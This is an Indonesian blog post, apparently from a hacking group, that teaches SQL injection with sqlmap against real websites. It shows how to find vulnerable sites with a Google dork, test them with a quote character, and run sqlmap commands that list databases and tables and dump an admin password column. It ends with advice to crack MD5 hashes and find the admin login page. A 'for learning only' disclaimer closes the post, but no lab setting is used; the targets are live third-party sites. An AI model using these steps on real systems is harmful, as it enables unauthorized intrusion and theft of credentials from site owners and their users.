Urax-Arix Team - Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
Anda ingin mencobanya...???
Ok,kita download dulu alat prakteknya nya :
- python 2.7 rar
- sqlmap-0.9.rar
- inurl:php?id= site:com
Cara instal di Windows
Instal python pada Drive C , sekalian juga kalian extrack sqlmap di Drive C.
Setelah di extrack buka CMD lalu ketikan : cd\sqlmap\
maka hasilnya akan seperti gambar di bawah ini :
Tahap Injeksi Pertama dan yg paling penting, kita harus menentukan target kita, caranya dengan menggunakan dork-nya google, dengan cara : inurl:php?id= site:com (nah di site bisa diganti dengan code negara, misal jadi id untuk indonesia)
Setelah dicopy, buka tab baru, lalu pastekan ditempat pencarian URL dengan diberi tambahan tanda petik atau ' , jadi seperti ini :
www.xxxxx-xxxxxxx.com/subcat.php?id=2' ( kita menggunakan ini sebagai target )
Jika vulnerable, maka akan muncul tulisan berikut :
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 , seperti gambar berikut :
Jika menemukan tulisan tersebut, kemungkinan besar kesempatan bisa diretas atau tembus ke database web tersebut.( Ingat...Kemungkinan !!! )
Next,Buka commond prompt lalu ketikkan :
sqlmap.py -u http://www.xxxxx-xxxxxxxx.com/subcat.php?id=2 --dbs
Jika berhasil, maka beberapa database akan ditampilkan di commond prompt ( CMD ) kita, seperti berikut :
Databasenya yg ditanda panah warna merah, dan kebetulan database web tersebut ada 5
Jika sampai sini, kita bongkar database nya, yg sekiranya ada username sama passwordnya dengan cara : ketikkan pada commond prompt :
sqlmap.py -u http://www.xxxxx-xxxxxxxx.com/subcat.php?id=2 -D keywords --tables
Klik Enter...
Catatan : Syntax -D yaitu untuk perintah mengeksekusi database, setelah syntax -D, masukkan database yg dipilih, disini kita pilih database yg "keywords".
Nah,setelah dimasukkan perintah tersebut, isi database akan terbuka, seperti berikut :
Selanjutanya kita eksekusi lagi tables database mana yg sekiranya terdapat user sama password admin webnya, karena kemungkinan user sama passwordnya ada di table admin, kita eksekusi table yg admin dengan mengetikkan perintah :
sqlmap.py -u http://www.xxxxxx-xxxxxxx.com/subcat.php?id=2 -D keywords -T admin --columns
Catatan : Syntax -T yaitu table mana yg akan kita eksekusi, disini ane pilih table admin maka akan muncul lagi kolom dari tabel database admin seperti berikut :
Ini dia isi dari kolom database keywords, setelah itu, kita dump saja kira-kira apa isi dari pass di kolom tersebut dengan perintah :
sqlmap.py -u http://www.xxxxxx-xxxxxxx.com/subcat.php?id=2 -D keywords -T admin -C pass --dump
setelah itu tekan enter, tunggu sebentar.
Dan lihatlah password pun terbongkar.
Jika sudah berhasil ngeretas begitu, kita tinggal cari page login adminnya
Perlu di ingat,terkadang banyak password yang di Encrypt,untuk itu kita harus berusaha memecahkannya.
Untuk Encrypt MD5 kalian bisa menuju ke :
Alternatif 1
Alternatif 2
Alternatif 3
Atau menggunakan tool Decrypt,dll.
Kita tidak akan meneruskan sampai masuk ke data base,karena tulisan ini hanya untuk pengetahuan dan pembelajaran bukan untuk tujuan merusak.
N.B :saya tidak bertanggung jawab atas apa yang anda lakukan, ini hanya untuk materi pembelajaran saja Semoga bermanfaat, terima kasih ^_^
sqlmap.py -u
0 komentar:
Posting Komentar